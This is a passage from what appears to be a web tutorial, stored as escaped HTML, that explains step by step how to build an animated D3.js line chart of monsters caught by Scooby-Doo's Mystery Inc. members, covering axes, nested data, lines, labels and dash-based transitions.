&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// y-axis values to cumulative caught range
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// y-axis goes from height of plot to 0
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;let&lt;/span&gt; yAxis &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d3.scaleLinear()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .domain(d3.extent(data, d =&amp;gt; { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; d.cumulative_caught; }))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .range([ plotHeight, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;]);
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We set the limits of the x- and y-axes to be between the min and max of
the respective columns (returned by &lt;code&gt;d3.extent&lt;/code&gt; with an anonymous
function returning all values from our respective columns). We then
define the actual length of our axes to be our full plot width and plot
height. Notice that when we define the y-axis, it is defined from top to
bottom (from plot height to 0).&lt;/p&gt;
&lt;p&gt;Then, let’s add these axes to the plot. We move the x axis to start at
the bottom of the plot, and define it with a built-in D3 function used
to create a bottom horizontal axis (&lt;code&gt;d3.axisBottom&lt;/code&gt;) and a left vertical
axis (&lt;code&gt;d3.axisLeft&lt;/code&gt;) which require a scale (which we created with
&lt;code&gt;d3.scaleLinear&lt;/code&gt; in our &lt;code&gt;xAxis&lt;/code&gt; and &lt;code&gt;yAxis&lt;/code&gt; functions). We also set
stroke widths and font sizes for both axes.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// add x-axis to plot
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// move x axis to bottom of plot (height)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// format tick values as date (no comma in e.g. 2,001)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// set stroke width and font size
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;plotGroup.append(&lt;span style="color:#a5d6ff"&gt;&amp;#34;g&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;transform&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;translate(0,&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; plotHeight &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;)&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .call(d3.axisBottom(xAxis).tickFormat(d3.format(&lt;span style="color:#a5d6ff"&gt;&amp;#34;d&amp;#34;&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;stroke-width&amp;#34;&lt;/span&gt;, lineWidth)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;font-size&amp;#34;&lt;/span&gt;, mediumText);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// add y-axis to plot
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// set stroke width and font size
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;plotGroup.append(&lt;span style="color:#a5d6ff"&gt;&amp;#34;g&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .call(d3.axisLeft(yAxis))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;stroke-width&amp;#34;&lt;/span&gt;, lineWidth)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;font-size&amp;#34;&lt;/span&gt;, mediumText);
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;svg id="scooby1"&gt;
&lt;/svg&gt;
&lt;script src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/scooby_scripts/scoobydoo_1.js"&gt;&lt;/script&gt;
&lt;h2 id="adding-lines"&gt;Adding lines&lt;/h2&gt;
&lt;p&gt;Now, we need reformat our data slightly to be able to create a line
chart with multiple lines. Each line will represent a Mystery
Inc. member, so we want to create a hierarchical tree structure with
the data for each character nested inside a separate key.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// turns data into nested structure for multiple line chart
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// d3.nest() no longer available in D3 v6 and above hence version set to 5
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;let&lt;/span&gt; nestedData &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d3.nest()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .key(d =&amp;gt; { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; d.character;})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .entries(data);
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here, &lt;code&gt;d =&amp;gt; {return d.character}&lt;/code&gt; defines an anonymous function which
takes our data as an input and iterates through the character column so
we can create a separate key for each character with &lt;code&gt;key()&lt;/code&gt;. We then
supply the data values associated with that character inside the key
inside &lt;code&gt;entries()&lt;/code&gt;. You can investigate the structure of the nested data
by running &lt;code&gt;nestedData&lt;/code&gt; in the JavaScript console when in “Inspect
Element” mode.&lt;/p&gt;
&lt;p&gt;Then, we create a path element which will have new class defined by us
called &lt;code&gt;drawn_lines&lt;/code&gt; (we can create a new class called whatever we want
in the class attribute) so that we can access this specific path element
later on. We define another anonymous function to color the line by the
hex codes in our color column. Finally, we define how we want the path
to use our data (it will be a line (&lt;code&gt;d3.line&lt;/code&gt;) whose x position is
determined by our &lt;code&gt;year&lt;/code&gt; column, and y position by our
&lt;code&gt;cumulative_caught&lt;/code&gt; column)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;let&lt;/span&gt; path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; plotGroup.selectAll(&lt;span style="color:#a5d6ff"&gt;&amp;#34;.drawn_lines&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .data(nestedData)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .enter()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .append(&lt;span style="color:#a5d6ff"&gt;&amp;#34;path&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// set up class so only this path element can be removed
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;class&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;drawn_lines&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;fill&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;none&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// color of lines from hex codes in data
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;stroke&amp;#34;&lt;/span&gt;, d =&amp;gt; {&lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; d.values[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;].color})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;stroke-width&amp;#34;&lt;/span&gt;, lineWidth)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// draw line according to data
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;d&amp;#34;&lt;/span&gt;, d =&amp;gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; d3.line()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .x(d =&amp;gt; { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; xAxis(d.year);})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .y(d =&amp;gt; { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; yAxis(d.cumulative_caught);})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (d.values)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;svg id="scooby2"&gt;
&lt;/svg&gt;
&lt;script src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/scooby_scripts/scoobydoo_2.js"&gt;&lt;/script&gt;
&lt;h2 id="adding-text"&gt;Adding text&lt;/h2&gt;
&lt;p&gt;Now we will add a plot title. Create a text element for the plot title,
defining where it is anchored, the x and y position of the anchor, what
the actual text says, and its color, font size and font weight. We
append the text to the whole svg, rather than just the plot. So that the
title is above the tallest point of the y axis (end of the &lt;code&gt;plotGroup&lt;/code&gt;).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// create plot title
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;svg.append(&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;text-anchor&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;start&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;, margin.left)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;y&amp;#34;&lt;/span&gt;, margin.top&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .text(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Monsters caught by Mystery Inc. members&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;fill&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;font-size&amp;#34;&lt;/span&gt;, bigText)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;font-weight&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;bold&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we’ll create legend labels for each line which will identify which
character each line belongs to. Here, we create another group in our
plot that is going to contain text from &lt;code&gt;nestedData&lt;/code&gt;. We set some
attributes in terms of how it will look, as well as give it a custom
class &lt;code&gt;name_labels&lt;/code&gt;. We also decide where these labels will go, giving
them an x position slightly after the last data point on the x axis
(2021) and a y position based on the location of the final value on the
y axis (where the line ends). The text and color of the label will
depend on the character and color columns in the dataset.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// create legend labels i.e. character names
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;plotGroup.append(&lt;span style="color:#a5d6ff"&gt;&amp;#34;g&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .selectAll(&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .data(nestedData)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .enter()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .append(&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// add class so name_labels can be removed in drawLines()
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;class&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;name_labels&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .style(&lt;span style="color:#a5d6ff"&gt;&amp;#34;font-weight&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;bold&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .style(&lt;span style="color:#a5d6ff"&gt;&amp;#34;font-size&amp;#34;&lt;/span&gt;, mediumText)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// set location for labels (at the end)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;, xAxis(&lt;span style="color:#a5d6ff"&gt;2021&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; mediumText&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;y&amp;#34;&lt;/span&gt;, (d, i) =&amp;gt; yAxis(d.values[d.values.length&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;].cumulative_caught) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; mediumText&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;fill&amp;#34;&lt;/span&gt;, d =&amp;gt; {&lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; d.values[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;].color})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .text(d =&amp;gt; {&lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; d.values[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;].character})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;svg id="scooby3"&gt;
&lt;/svg&gt;
&lt;script src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/scooby_scripts/scoobydoo_3.js"&gt;&lt;/script&gt;
&lt;h2 id="adding-transitions"&gt;Adding transitions&lt;/h2&gt;
&lt;p&gt;First, we will add a transition for the labels we just created. By
wrapping our plot-creating code in functions we can recreate the plot at
specific times. We will start by wrapping everything in the previous
chunk inside a function called &lt;code&gt;drawLabels()&lt;/code&gt; and add a transition which
makes the labels appear after 500 milliseconds, giving them a “fade in”
effect.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; drawLabels() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;insert code from previous chunk &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; here&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;opacity&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .transition()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .duration(&lt;span style="color:#a5d6ff"&gt;500&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;opacity&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We are also gonna create a transition for the lines that makes them
appear as if they’re being drawn from the start to end. Unfortunately,
the easiest way to do this involves some trickery involving the
&lt;code&gt;stroke-dasharray&lt;/code&gt; attribute of each line. This attribute defines the
dashed pattern of a line. So far, the lines on our plot are completely
solid. We will introduce a dash so large that the length of the dash and
the gap between each dash is longer than the width of the plot itself.
We then manipulate the offset of the dashes to make it appear that the
line is growing over time.&lt;/p&gt;
&lt;p&gt;To do this, we need to create two functions. The first, &lt;code&gt;tweenDash()&lt;/code&gt;
returns a function to take the &lt;code&gt;stroke-dasharray&lt;/code&gt; attribute of a line as
an argument, then manipulate it to get the next “frame” of the
animation. This will keep looping until the dash is covering the entire
length of the line, making it visible. And it will take 2500ms to do
this, as defined by &lt;code&gt;duration(2500)&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The other function, &lt;code&gt;lineTransition()&lt;/code&gt;, takes a path (i.e. line) as an
argument and passes that path’s &lt;code&gt;stroke-dasharray&lt;/code&gt; attribute into the
function returned by &lt;code&gt;tweenDash()&lt;/code&gt;. It then applies the new dash
configuration to the path. Note that when the transition ends
(&lt;code&gt;.on(&amp;quot;end&amp;quot;, ...)&lt;/code&gt;), our &lt;code&gt;drawLabels&lt;/code&gt; function is called. This is to
ensure that the labels appear only when the lines have fully appeared.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; tweenDash() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;let&lt;/span&gt; l &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.getTotalLength(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; i &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d3.interpolateString(&lt;span style="color:#a5d6ff"&gt;&amp;#34;0,&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; l, l &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; l);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(t) { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; i(t) };
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; lineTransition(path) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; path.transition()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .duration(&lt;span style="color:#a5d6ff"&gt;2500&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attrTween(&lt;span style="color:#a5d6ff"&gt;&amp;#34;stroke-dasharray&amp;#34;&lt;/span&gt;, tweenDash)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .on(&lt;span style="color:#a5d6ff"&gt;&amp;#34;end&amp;#34;&lt;/span&gt;, () =&amp;gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; drawLabels();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, wrap your line-drawing code (the code chunk starting with &lt;code&gt;let path =&lt;/code&gt;) in a new function called &lt;code&gt;drawLines()&lt;/code&gt;. We add two new lines at the
top which removes any previously drawn lines and labels. We chain on a
call to the &lt;code&gt;lineTransition()&lt;/code&gt; function at the end of our path code.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; drawLines() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// remove previously drawn lines when re-drawing
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; plotGroup.selectAll(&lt;span style="color:#a5d6ff"&gt;&amp;#34;.drawn_lines&amp;#34;&lt;/span&gt;).remove()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// remove labels e.g. &amp;#34;Daphne&amp;#34; when re-drawing
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; plotGroup.selectAll(&lt;span style="color:#a5d6ff"&gt;&amp;#34;.name_labels&amp;#34;&lt;/span&gt;).remove()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;code which starts &lt;span style="color:#ff7b72"&gt;with&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;let path =&amp;#39;&lt;/span&gt; goes here&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .call(lineTransition)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
